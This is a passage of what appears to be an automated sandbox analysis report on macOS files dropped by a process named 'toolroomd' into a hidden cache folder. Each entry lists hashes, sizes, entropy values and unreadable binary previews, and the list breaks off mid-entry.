MD5:	ABF45E7712A2B852579A2C279CC562A5
SHA1:	AAA8D42843F2F2537AB9E02E9E99208827FF7912
SHA-256:	3449E9F5BEC7873891940DE69B7FBFD65CB881DB07DA027ACFD4385EE364A9C7
SHA-512:	B355F3CF0D34B9F9A249D5CB5A9AA316733DA7E2B89659077A8B8E27F8615C951BFD61472793DCD5CCB70CEA2B7ADF3B09659B6EC79C3637F22D225FAC2ADEEC
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W.}.!..;.p{.>..kZ.!.~J.1r#c......ZaU........!......m.....JC..n(C...]/G...,...q..r.M.V....\.Ir04;..D.5"...........3R..0F...C..J3........7.%^..RB..cvI.....<...dIV...P._\.+.vS.K0o.58.F2.\..Li.^'\|..\.......R...&....y...f0.~Lz.5..h..'m.g....;X<.^(...$......h9.S....\...i.\|M.$...C........tg.&..;...0......\|n.^...]@Q%."j0..n..rJ....0...S..W.7..+..V.By-.H'%.f..(..K.Z..lBK.q.g..+.2..V.iR..1...id..g..jz..!..p}rSx......cQ.7.'.}..,....[..J:.,S..,..iz..g].^.v.,7n.\|...T..H..h4p..{..f._T...'VA....!..[.....@...fP..FU.._...u....U..e+..6...^.W.....Y.....c.Hnt5.....,.....Q&..5.+.H.8=.0lW"....+......4.".......4j.#y6....oY..E....l.....^5TZ~.'.[...\\_....@...fP.z.....t.4.O.L.[.5..<.nv.`.......IU..$7;u}mc!...(_].".z.....:.\....[.O..R..m...'..C..ui.P0u.@.8.<...y....G......F;.......'.R..1....e.(..._.....C.p}rSx...x.i.....0R.D._.(Qvt.$aEmO.U5...0g.f.<.....%=....L......5*.3.......1....O1..q...T..O#l#p..\|7G,.2.].v:.t.^.#.3..2.......@1]}...,.jh.#J

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A5CF2005-AC95-4DE4-9774-0879505F2999.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	107208
Entropy (8bit):	7.838154380927831
Encrypted:	false
SSDEEP:	1536:GokKX4AGJAy/lLVoW1YkewvWyDHCc4HfGPy8VMpg19TDIb1fH:GzAGZlJoIYksyB8fGPfGW9Q5fH
MD5:	A4017E947B7414E51191731C7B313551
SHA1:	4E4532B526F2CED63E9000B3B96A5B3D631DF290
SHA-256:	6A0067FF019704319FECECBBAE3E7EAE1E9D18A4E0EA78A02BCDCEC3CDE65138
SHA-512:	0F76693FCF592146A660B4CC83E0790D2F61E88A8CF09812B7A6D55C5FFFA5F95EA4C47E709F8B292F9EE44E75A2742A09CCF5FDA0036743D2D7DFCEB4A312AA
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.#=...#U....0?,..5.4.... .....D.V.J....7..(.....UN.#..i?r...+`.ds..D. ..C._.-.Z..].....>s.{...u..N4.w.o..x.@.9.g.[),u..(G.h...E..f...,,Y&.&..Q..J$.wZVW,..y..!,/.a./.....2..A.@!,....{.j=/.2`V.uG.a.._..^g...=.K...u.7...............+...D...YH..5.3....E./[.!.........v..O.....#....Ov....S .!"...T.;.x.W,B....q=.f1..P.........q..\n..x....}..?.T..hm...t..M...${..p..,9...."....M..{.....eu%...h.FF......].T^..$..~.....Y.........T>..!..!.....h..u.^N...<..<m....u..N4............j..4~`..T.pj_%s..{..p..,9.....A....M..{...9...>3...........:.h .P6t(e..\..V.."J.!.:...M..l......W.MR..AFz....U..>s.{...u..N4.w.o..x...g-.d...8]..T..NC....u.9.8..w..<@n..-..J$.wZVW.d.X.h../.a./.....2..A.@!,....{.j=/.2`V..T.KTB..@.$......;8e..o.{.#../@...:.<...=.....g...}l..N-o..../[.!.........v..O.....f'........,......L.!.oq. %........1.._.P.........:&;[-.\.{.cY....]..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.AD51A44D-7A76-42B0-8647-1F59ED82F1E0.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26707
Entropy (8bit):	7.957586684532652
Encrypted:	false
SSDEEP:	768:JZCumo4kyXiHSuvPdYQ5UsX7Oh4OHHPQtU+wxBiCfWV6+Ovs8:TCuDbyXiyQeQ5Z7Oh4O/+STeV6Ps8
MD5:	9D03A2C3767A5CCB608A94C9376B2417
SHA1:	BFFCA0544C6C228A2E22B135D761930F464394E6
SHA-256:	0C056AF9060490053CE3F0A9E2EA21096F1CDC55D2B02974C63470318D31D9A5
SHA-512:	70F6CD9897468B5430D288BBB4D2244CA826EEE5E6EFCC0AB09DBCDB01368A27397FF7B277FEF13BB1421295A103B4B853D1DA0E31E84D057D955AE58103A39A
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WO.Jo..<.(.R....DG{.U....k..$.y...^....r......!......m[..g..'H.......0....s..L...b...fTE.eK..vM.0.+.\......@%..8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#.,,K ...W.;%V0nZ.:..epi..4.\..TyB.9. ..k..[.M8.1M.}......\|$.._.A[j.Y..l.2.3_7.OO...B.....i..G..h.'.H<.>3...6hxae...../....)...p}rSx...K...F..!~v.l......Q.....:R.(.....c.A....;e....s/.q....4y>#i:..J.w..5.46..Y.....[6....7u......".`"e!..c..}x.}.K.Z..l.....&../R.H....................h..Mu....5I..9iT...`...Kmg..#..`..}..77.#.......4....u....L.'E]..~..v-..?.&{.'.+......i.......6q..y.gB....../.........h.D...@....2e`r.e..0<..TNR>3...{A...,@..^...@.8..G.m...i..._.f$.n.S..6.c..6.z...o.6....sZOD..hHk....M....e.....:\|..,w.B.....ABUK./..O.W.2...b.x............W..qCd..g.3.B.i..d...R.jW...I....B.oVi....C......j.#l....!.cR..D...M......Z....AHq...R....w.....<..G..q........>.... ......"?.......u.Z.v.x.%.t....P.......p.......Ba..7.Kn]\|....}(T,$L.R0...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.ADC5DCE9-2F33-4272-B674-11433D26B20E.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	87911
Entropy (8bit):	7.853451814804314
Encrypted:	false
SSDEEP:	1536:GFXU9Uf9mA0hM73jO+YWh3pYqxkYdCCHoAwQYek6Ukg7G56:GFXU9UVmA0E3S+J+qxkY9Hzrl0
MD5:	B803E676F3A610FF523439724AF16B80
SHA1:	291F41600FB2D2026A04BB978A4D6EA5B754B54D
SHA-256:	CAF07CFBE4B68D7EB651FE58D02B27997D57D9F1C8C7B8FE3087208777F30B6F
SHA-512:	89542B726802DC1EA0EE192C9E412AABE5FC045A357CE460B2FFE1E4680476E40154680DC8F84DA79BFE72EC0BE092C482B7BC9B43BC4163F28A4C17995939E9
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...$.9.B/dj1..c ..q:....TJ.k.S.U.4.......v^.;....7...vP...Z...M..{..+9w...f...Bi......xk..!U..\...oP......z....dh...<..!....}...1....gq~AD.}.C..$.4EV.B....._......v..O.....@.kZ.%.@.6..t..J.c8Q...E-n.u^\i..f.z.6..M..2...x.C.RHoFd........Vw.D.vz......h.......m#.y....>s.{...u..N4.A.....m6...7..s..->.G...S.f.[..7.j..P.....^..p...r%...=m...........9.=..H.jDy}..s....G.z....dh...<..!.X.b.Qu.v.m-..U.....;[?D.>...G..B/.a./....A-..W.!,....{......q.".^.(Uqw....\|.WR.}.."..{..p..,9P...Z...M..{..+9w...f...NY.>...xk..!...9. .&oP......z....dh...<..!....}...1.b.....#G#zIT.......\|-H....._......v..O.....K/...n....;[?D...B..R./.a./....A-..W.!,....{......q."..B..R.T`$J[.k.2.A.y....=.....) Z...P?..........p...r%....NP........K..q.$..F.W.7ZE .....\|-H..h...#.....v..O.......w;....z..".F?..k..(.o.`=.....>.r...96..M..2...x.C.RK.Ge......v.[.j=.#`4..`.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.B6BA766A-92E4-4ACE-BC29-0C0414D8305D.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	187501
Entropy (8bit):	7.931148041045572
Encrypted:	false
SSDEEP:	3072:GpnOQUitRJBg7dl/+iZToci1Caj3JU/8Y37V2P9x9yfwgCklENBkSuduwOyK7lur:FQUitRJBcdlWiZToci1Caj3JU/8YoDIx
MD5:	BDDAFC02D451ACD0F7DBB562A31DAD64
SHA1:	5F420BD39BF2D3BAD47E9C8E8191F7BE09BB1A18
SHA-256:	76CB637DEEF547CF37D06B643F60195A815DC35E54550A86E5A434557DDD6D55
SHA-512:	887B9D28CE0626901BB214BFD7DE757101F5534E9096E3DEB1BEBFD82AD2603621460F879120C5C05D2EB8B844D408E9B46D628D29925ADED42FCC6EFA34ADE8
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.z..aX.+.Ug.....i..Amv..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{...n\|M..%6..9.`..;v..#.[.d[..^sq(kc.#A.\|tMe.j~........,.....c.;.:..p....p../.....^.....h.5..."#.....u..P.....^..p...r%......D......0...G..7..s..\$#7....ilBI..>s.{...u..N4.>dm....~_...ch...f..T...K!....kc.#A.\|tO..8{.......,.....c.;...K!.....6..t...iLA.,.7..3w.+l...r.~R.6..M..2...x.C.R......SpgwK..r5..\|..?.[.~.<....[F.. Z...P?.P.....^..p...r%.W.P.....W....& ....4..9.3..{.N.]9..g.p....C.A.....v..O......$........y....t.%.......X)#n..H>_.z....dh...<..!.....i?X.:..*........C....J.P;..m,;..W.6..M..2...x.C.RJa..:..5.@.op.SF)..F.Y]0.Ab.E.{..p..,9.n..Dr..M..{...n\|M..%6.Q..!^~.....m...Z.p.U....}....X..@Y.......v..O.....f....n..."e...n....Fi+.p..(Y.....:..+.....v..O.....9...W%.T.ae.>....Z.p.U$.4EV.B..X..@Y.......v..O......KC.&...f..T.l......kc.#A.\|tO..8{.......,.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.BB5BA468-61A9-4207-8252-90A6BC2508AD.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	913817
Entropy (8bit):	7.9728492930282835
Encrypted:	false
SSDEEP:	24576:PrkLfsoDRh8f6dMCR8kKohUqtH3iBtv68kP/80rHqz7IVdTSOsl:zddEuoDHIPX
MD5:	7925BE63BC33C3942209D4214C573518
SHA1:	14BB8E2A3B4A50E0A1465709EFD405240EA3935F
SHA-256:	0AE4D8FD3DFC8FF02DF87BD04FF7838E2375CE8E389F41E2CACF076B34C2C82C
SHA-512:	B960CFE118091ED86F209321AC294AF66B567994EFA664A73460DFDE1FBD36DC087CA213F35ECD9DB1063E533055BF4135190A30A71261B499776E5A9410760D
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.a....5..-.I.....I.Y......j.k.P./.I....CJ.aF}A.s.!..,.g(Z.V.!,....{..5p..O..M......}._f.j...L.Y.N.&{..p..,9.....A....M..{..../....9.$...6.......9.n^}.&EJe..m#.y....>s.{...u..N4..}O.r.....:-vh(..%nd<....O*.K..)..g..P.....^..p...r%....E..D.-.S..$w<.._...G...0..g....:..+.....v..O.......?.O/...3B.M..?...@n...oqx....1..\|.b.P.....^..p...r%..."Wqsq..H}.j....].5.jT.$.4EV.B....._......v..O......XR....=.s...3/.G.P..lkc.#A.\|t.2..........,.....c.;.&..C.....Co.%...!.MW...S.%.m\|m%...s....G.z....dh...<..!..#.'t...V...sh.?.&eo5..7,Ne..>..{..p..,9]Y.z.r...M..{..OM...\z...c.P..y..B.(Q..W;~Jg..)#n..H>_.z....dh...<..!.<.c....R5..u..=0...g...0B2?2&Q[..7.j..P.....^..p...r%......p.<-?.....uD{i.Z......}......:..+"v}O.:~n.O......g]v..{....g`.f........kc.#A.\|t.s.L..br.....,.....c.;.+;r...3-....}..........kc.#A.\|t$k.R...0.....,.....c.;...z...?o.....[......jT.p..(Y..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.BD0EAB23-7D88-4A89-9262-2D9B97D7F120.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18947
Entropy (8bit):	7.962017941110477
Encrypted:	false
SSDEEP:	384:JSmRv+KRozG/NhhXC3JqfOIGDCuinM8fyTO2s3s4WHCmoW8o:ImRv+KezGlDXC5SOIDuA3fyVs3s9HCmd
MD5:	93ACC4C88C451BE1BD10AC4598771552
SHA1:	0226D846E62D90629AC6A310DD83E8A7B68935D4
SHA-256:	69A96D2DF5C7162BAA3ED6AEF0293588D61F8D80EBEDF2ACBAA0B6D889589824
SHA-512:	9E48295422138003F3F03A751A69BD7985618FB4C4548B3F4CF2A09FEBAC83C1A9E07EA8F9BB033E63C7FE8E4B51AA3D474BC34F7BC8DEF3D63167F17687F101
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WC.R.k ...0V.j.V.u.1c7.....l.v.IP...uZX......!......m..MD........;..4g....[...1J.JgB....../....._....e[8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#.I..d.b..^8u.S.I.]oTUR..q.3...G.zE#n.J.D(.l....+\|v3..$...c.....\|CmM...[..h. .er.]..=..i..G..h.'.H<.>3...6hxm..)Q7..`j..........@L"K...F...1?....p.....]......)Ro.pL.W....3..=#.. .UU].%g....L...-....n...Hm~...;.._.....S....H.".....s.{....3.F.!.G....)........ .E.6g.....U./^9.,..Q.l...z.]..V.>....M\|...&...{4<..}..77.#..^.9...xxF...!.r.L.'E]..~..v-........?.aaB..<.&..SR.I.q..U..>NaK..vM.0.... G.k...8.A...N>&.L...Y8=.AF\~H...r.4..P...RD.+M..0%..vt.....@J...s.M........(.\..\|...^.Ha..k.,....+.N/..@..YvJ......)Ro.pL.W....3..=#.. .UU].%g....L...-....n...Hm~...;.._.....S....H.".....s.{....3.F.!.G..^5.K.p..9.}g....x?.....t!+.PLh9..(...s.O T.F....k.....^.!p.w]..,.(...$...f.y..iu.B.r...z.V.../.f.,.TU\..#.nY.....[u..Q.t.....z/...k......VR$.%.y.o\|R....+&p.......)f.v ..F

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.C14F10BD-86B3-4560-B073-6A6BCA7F794F.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	44196
Entropy (8bit):	7.757990084055238
Encrypted:	false
SSDEEP:	768:Gg4vTtwzzFt5jnx38SMy144mqgYpn9ITQxSfYuUvqF13:Gxbtwzzr8Sk1qgYpn96rQxqFx
MD5:	3BFF57203BC3BF72A2AC1C9EC588C834
SHA1:	F20512BE8AB1A366686B18CC73186ABF9D6D7B39
SHA-256:	8E13ED320C20AA1F5D0B6DD59495F98BA05D6C9E08534492E92C10E80F0B6063
SHA-512:	437DD9E14EB3299447A0C2AEA0312B4B106B42B3ED9EFDAAF1CD885A96B0289EC81F08CD724628719B39BE7F2C25E5138272DB2C3A9B7DAC9BF173AEEA62EDF8
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.&..MH.O....69..Ke_(...z..J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.t.........^X..F;.zz....Z..#.V.k.oP......z....dh...<..!.Be.lY.J....^7x.I[......o..,....{..p..,9.n..Dr..M..{..w..}{.i..=.......rY...o...)....2+Q...\c....ilBI..>s.{...u..N4.....0~kak.].]. f,.[.MGq.c@...yn.....s....G.z....dh...<..!....E....%m..s....^...2..@.i.T...........r.~R.6..M..2...x.C.R.K.oL.gu..t.0..\|).j..F..j.{......m#.y....>s.{...u..N4.....0..CJt.D..8.Z.O90tb........\|q..E.z....dh...<..!.C.....{.....U.....V>z)b..kc.#A.\|t.....S!......,.....c.;.._\.......Rk...O..fz.{..oe.../.a./.....2..A.@!,....{.;%-s...y...[.{.b...9..N.s...J}_c.c.....{..p..,9.n..Dr..M..{..w..}{.i.M....Q\|..N.v. .x....<..kc.#A.\|t.s.L..br\..P...K....c.;.9...6F.jH..L:/.a.g....,.\M..... Z...P?.P.....^..p...r%.{*.C.{[xA.'.)<'.....^6.V.F.Dy$.4EV.B....h...#.....v..O.....e+?.1K..d{....7.'.F.=.;

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.C2914824-1F93-4498-8975-09B8A8CBC60B.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18555
Entropy (8bit):	7.948334349707585
Encrypted:	false
SSDEEP:	384:YhwYm5wVX7FvO/9heE/aBMdA5/+MBZinMLid6jnS4G570Ib/Fbr:152X7ATViK+52IiMLu6rS4GhZ/Fbr
MD5:	9FB868976AD0DC0B30A6DBBA48D94CD8
SHA1:	719E9534A6BCEBFC2C645E76D5F096F4430E51A5
SHA-256:	FCB8E217F57B19C6D9ACCEF9005C0C2224506300E3369A7A240D651FFC5D1EBF
SHA-512:	10B39447B8565EC6C1CD3ECC5D1FB36AEACA19B7C0D46A2926E6B3B8C63F32802FA5C1A7BB3762D79923966C5DB4F7080766EBBFEBB5367047F4A6D0FF342D14
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W...PP.. cn+..r.Q.....`.=\|......z............!......m..Y1 ;.w.@q....m4g....[...1J.JgB....../....._....e[8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#..J..Z.6.........._.@.n...w...wn?...rr..:..].t.[d....'.o.....P..g..i.dH.R.....J.._.....i..G..h.'.H<...5 .=2D<!S...Yy...h6..n.(.~4 jK...F...........k.6...L......)Ro.pL.W......t..8......o)..Uj...A0=..c.\..Hm~...;.._..mv.imm..b.vr.<.....C.JD...I.....)........ .E.6g.....U./^9.,..Q.l.o...;.<.K(!...R^zm.:....9Mm.....i.B.0N9...}..'..j.60..........8.h..@..Eg..s...f.......SR.I.q..U..>NaK..vM.0.... G.k...8.A...N>&.L...C$........*..D92z%.~.^@R.....u..ul.\|.....]KN<....E.Y:.5U.>(_.6.)$a,L.....A.....\|..ll...)..C.U."E.q..S...}.0...S...t..qz.~.y.?.Y.k....p.K.Z..lBK.q.g..+.2..V.i..5 .=2D._...M...D..WT<p}rSx....\|Z^=......Y....2..{.W..Z.g...>.H..1&F....<...d..[.X...=b.ks....e.j.}...k......8..:.".&[.s.r.8......g.....^.!.{.m...q.OzIU.9......b.I.......O...a....Q..b.e...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D1668549-E894-45CE-98CB-C51B32169230.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	7898
Entropy (8bit):	7.919865737129545
Encrypted:	false
SSDEEP:	192:D4IapTlkKpyTgGRwMafDPRnkt/T+RF7PshCbGO:MnlkKpyDcb5kt+F4hCbT
MD5:	4B95EDDF2E2AD4E62560054762266D6F
SHA1:	EF86AB1519D038B5DEE81DC7E7DB1CF55B83C233
SHA-256:	585CC9E729C4D6D1AD35AB8CDFF44A07DC927BAED49943488B7183A06655310D
SHA-512:	2EB5AD3175868732092D156EA30E25C225A2813CA17A54ABDA0DD8A39C0ADC88CC3DD7D190561E3ED0D3B0B50D140A405AF4A87AF6C3DC44CB16CF37F92F174D
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..WDj....P.+.K.Tij`w.~...y.k.-W......`.._........!......md.,..\v...=...q+R..MW/o.7Z...A.0..s....F.2..[......[e.8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#.`J..&..9=..t...J.C.U".3!.O04$vS..S_...&2...WK#F..$.......T.5y<4....q..$8z#z.l..........i..G..h.'.H<.>3...6hx.\............n.(.~4 jK...F..._-...'.......:R.(.....c.A....;e.....Y.......b..M..J.w..5.46..Y.....[6....7u........bw5... .y.W...K.Z..l.....&../R.H....................h..Mu....5I..9iT...`...Kmg..#..`..}..77.#...~....J@p..} vn.L.'E]..~..v-..Fl.a..'...if`.+.dv.)..t.-.$..`<..S/..}D..^.,.{.A.y..g..9..a.R:]..t.o..W$......h...j...%I...e...9iz..7.x.{\q......M`..z.-P(..2.'t...fe.G....w.[n..e...V..,.:R.(.....c.A....;e.....Y.......b..M..J.w..5.46..Y.....[6....7u........bw5... .y.W...K.Z..l.j..>.}&...H...h...w...3..7.:.....[.jFD...>.=...Q....3r V...!QVX...ZN.E.[\e...6<..O\|D*WW!.`4.1..,.]=..q....Ev....h...@O...=.s..:..c.!._;>..Vt....J~....R...xg.D..[

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D38E7BCF-CD66-4D26-94F7-67EF840B2C22.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	59285
Entropy (8bit):	7.621061371160869
Encrypted:	false
SSDEEP:	1536:GUN3eG03msL4kd0y5fo8ZAPC3CsaNeoU+Wj:GC3Gd0yW8ZAqyBEN+Wj
MD5:	39634966614E537122F9C72C62CDD17A
SHA1:	0DDB1E390C34CB45F3B688A402E6D7463952ED42
SHA-256:	2DAD8F85B1CBC5214E641C92360E743B297ED845CA4D66A1B1B3EB093DCAF308
SHA-512:	52F85EE22C1E38F65BD775FD314222D6979E576A4A0C8B8BA99D1B31B9D1125DC5CF59C39C62766EA9A0DB518654C28BE005430B1214D75C85853895305B0A40
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......Z..Q.0.\-^>....i..J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..B....h.Ev,..My.]).Z.......g.I...J%....h...#.....v..O.....?..\|..b.....2........n*...Go....kc.#A.\|t.....S!......,.....c.;..W../....j. .E...k....N.\|.L..^/.a./.....2..A.@!,....{.;%-s...y.5...E _p...)...y..$.(;GTe.f.T{..p..,9.n..Dr..M..{.....o..v..9.G[.......D....N.O...U"9.........ilBI..>s.{...u..N4....<b)]...\|b...@Z..~..K.N.P....&....s....G.z....dh...<..!.Wa'.Zj..'....,.g..Z/."..k.#...`W.U.......r.~R.6..M..2...x.C.Rw....b..G...S.[`..]F....~K..d;.vZ.z. Z...P?.P.....^..p...r%..@..P.i.q.u...=.My.]).Zt6.Q....$.4EV.B....h...#.....v..O....._.x...e.?..\|..@..BD..W!3....:..Skc.#A.\|t.....S!......,.....c.;..<...C...J-.......Y.....sus..Z}/.a./.....2..A.@!,....{.JH....(W..f.g..a....z....Cu.[.....\|...{..p..,9.n..Dr..M..{.....eu%........D.T..._.k.4.sM..>.....t].....ilBI..>s.{..

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D3EAC4D0-8494-4F6F-88AE-4196CB408F7D.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6410
Entropy (8bit):	7.905356179347282
Encrypted:	false
SSDEEP:	192:CZcDiYP1H7wR5kpCdmkwk6Rskmt+L1hy5ZC:I4Nb14xwPJh6ZC
MD5:	3F88FFD40324EAFCCA41916E500392A2
SHA1:	2D5C173B842F5E8A6E5C2A08B59EF38EA4D0D52C
SHA-256:	FBDCE5C6D13400CDE82A9C48DD94AB94A22AE749EB0DC3FE16FACCE09EEB0F1D
SHA-512:	161197EC95C8C6A4F47C2D467FB7E7B89CC41A1348295DD7CCEB5C54F23539AD5F17750EE7915B5FCAB9EA53272F10B0ECEFC500554058DB559484C60A707E1A
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W../.E>.aG..l...M......T.4........:........!......m(..#;..n"....Z...E.g..R.S.^..9..........Q&...<..r1.!pFq.VL....y..... G.k..XqRL"R.Q......}`.._..Yi.NDG..^1W'...gG.\|k.w........I..%..p.....S..N;.....Ka.i....<..l?s<L....F..l.N_4-..%....tn.#eK[..K...[....1z..y._Sw.]...$...f d.r1.......+.[i....6B.~.....g<..M(i.W.........e..:R.(.....c.A....;e......)...us^....J.w..5.46..Y.....[6....7u......".`"e!...bhN.....K.Z..l.....&../R.H....................h..Mu....5I..9iT...`...Kmg..#..`..}..77.#.B...i.....F.WrQ.L.'E]..~..v-..Jd.jp...e......=.\i..n8.-.$..`<..S/..}D..^.,.{..j.?/..9..a...uvf.U...=.{0..I.<...../...6..Qj./~....x..\|..5v.W.n7r.o.9..5V..F.WrQ...+.N/..`U.2....S...CO.h.l....I...=G..e.M31".M....m.S..K..._..k..v-....".l..:R.(.....c.A....;e......)...us^....J.w..5.4..=,......[6....7u......".`"e!...bhN.....K.Z..l.j..>.}@.+..jh...w...3*..7.:.....[.jFD...>.=...Q....3r V...!QVX...ZN...vZ.v.4.}......T.o...O..z......h.?.L..r

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D4BCC0DE-6C0E-4D26-AB80-76C532CE6CF7.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21883
Entropy (8bit):	7.9590061717644724
Encrypted:	false
SSDEEP:	384:nxaeV/ogn3QZvX2W2XkOiEL9wkl0OjJ/Y31F04Wy313z0eK3oJ76DjVyyi:nxP/oE3Qdr2XL9w6jKk4WyZJKCqjV9i
MD5:	AC7B2471258B9D5918C5D976F7961191
SHA1:	409B91B995590DD6E20CDD962C77002DE25AEF0C
SHA-256:	1FB9FC01D8940CE4C43A3825EBE7EC7118A2DD64F8C103D8D1CF3DC9E30AFD68
SHA-512:	63120EA8D97D404CEF4548FA45AC5BFC2301C0691B55C2E3D93320009D698BBE623E34BD9513AB8EB7378810268DE1BC0D939F6A24B027910F8289085A2ABB82
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..Wz.......C.....?.F..N.0..c?..h4dH....my......!......m..Y1 ;.w.NA....4g....[...1J.JgB....../........."..8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#..I...'..$.1..x..V>.&.V.Y..7uA.C.....e.%1.Nqc..#...G..5..5.0.I.H.#.Y}.q.s.T..x..{......i..G..h.'.H<.5k.x.H.s.^.PL....i...N....@L"K...F.....l .o..n]..v&.......)R......vkR.<.wB..O..2!D.....aX....-....n...Hm~...;.._....k..T.J..P..L.Z.......3.F.!.G....)........ .E.6g.....U./^9.,..Q.l...z.]..V.>....M\|...&..}.}Q.t..i.B.0N..c \|..:................8.h..@....y.?v.sT.c.DC-.>..85.....,.....Q&..XM..%.P@C.B ...V.FM2."..=j..2e.-...d.s...ul.\|.....]KN%`. AW......'..#..s...vf./L...%..i......[n..e...V..,.:R.(.....c.A....VD....x.EFVDF.4y>#i:..^.S....6..Y.....[6......7xz\.A...`.rV.....%E-.....'...j..>.}@.+..jh...w....I.3.....[.jFD...>.=...Q....3r V...!QVX...ZN.^6.$...a.g.T...O6.x.3.V.....Yi0u H.K2....mnW..\|....2jY....O...a....QN.......;S.....!rP..2...Q.= =.%.L...

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D4D5E426-8501-4C38-8ED4-CB3D10B4405E.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	7442
Entropy (8bit):	7.916482378294523
Encrypted:	false
SSDEEP:	96:37VE1CwcBARZfiq9qo3dNktipG86iihHqlcgw7xGyo6oOZQ2kq4/th5ffZfTI05J:53dARZfi6Tciv6iKHog7WDONkXTfnHD
MD5:	44E526E5CB56A647E0AABAC045D0174D
SHA1:	107F95220C3F97974A4B0360018F7384617F049E
SHA-256:	AC89B1247945A052C18FD87324BF98309FF16CBAA8209938E72C61E22F87471E
SHA-512:	4D5A4F18C0B13DAD5BF80A07F34E788E2D56C0410AD859AF1788FF0153457D415450A5A330DE4FAD3C0D51D63FD25A37DAC69870120192113388728649F789D0
Malicious:	false
Preview:	..z.J-H.....C...Qk.k ..W..Rk\|..i.3!wA....r.].$.&..V.l.$.e<.........!......m[..g..'H.-6...D.R..MW/o.7Z...A.0..s....F.2..[...;a.Ahx8.9 .<...f.9...."...Nx......n.P.4)PT...s.?)..W..[G......#.h.m.g.=%..J]H\|.?.fV2.m...[..Dd.!....JVV>g..K...P.oK0.....J....)..Y/....;...!...->m...i..G..h.'.H<...5 .=2Dbf...#%..Ic.x.=_n.(.~4 jK...F....W..e....j.d.V.:R.(.....c.A....1......"..Z.}.08,.G.\|P.J.w..5.46..Y.....[6.....Y.Q..:..O....Z1,=..G....K.Z..l.....&../R.H....................h..Muu......+1....N.]..=eJW"....$..}..77.#.\....K.....Kb.L.'E]..~..v-..k...EY..X....~.vdv.)..t.-.$..`<..S/..}D..^.,.{.......>..9..a..^>.....4J....Z+..e.V...@.7SQ..d..._..../.N.kA.....&g.^.V...}Z5.}[.)-..D.1T...o.....m........;...n.../...?a.hMb.rm<".......'..5 .=2D.O".i@v.C9~@..>.p}rSx...x.i.....0R.D._...A._lYO.05..}EJ.!...x.o.u..6\G.Z...x5*.3.......1....O1..q...T..O#l#p..\|7G,.2.].v:.t.^.#.3..2.......@1]}.......D.eT.o...O.....kM9a..8.G..\|.OJGs.x..e....wM.Z./.@O...........c.!._;>.

/Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E252C87F-8839-46CD-9DB6-37D6704B2AF0.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	69582
Entropy (8bit):	7.75516462425684
Encrypted:	false
